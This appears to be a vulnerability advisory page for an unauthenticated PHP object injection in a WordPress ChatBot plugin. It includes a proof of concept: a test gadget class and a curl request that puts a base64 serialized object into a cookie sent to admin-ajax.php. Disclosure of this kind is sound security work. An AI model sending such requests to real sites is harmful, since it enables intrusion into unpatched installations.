Lucene search

K

ChatBot < 4.4.7 - Unauthenticated PHP Object Injection

🗓️ 12 Apr 2023 00:00:00Reported by wpvulndbType 
wpexploit
 wpexploit
👁 108 Views

ChatBot 4.4.7 Unauthenticated PHP Object Injectio

Show more
Related
Code
To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then, when a GPT engine is set as Open AI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the below request to trigger the unserialisation:

curl -X 'POST' -b 'last_five_prompt=Tzo0OiJFdmlsIjowOnt9' 'https://example.com/wp-admin/admin-ajax.php?action=openai_response'

Tzo0OiJFdmlsIjowOnt9 being the base64 of O:4:"Evil":0:{}

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Apr 2023 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.002
108
.json
Report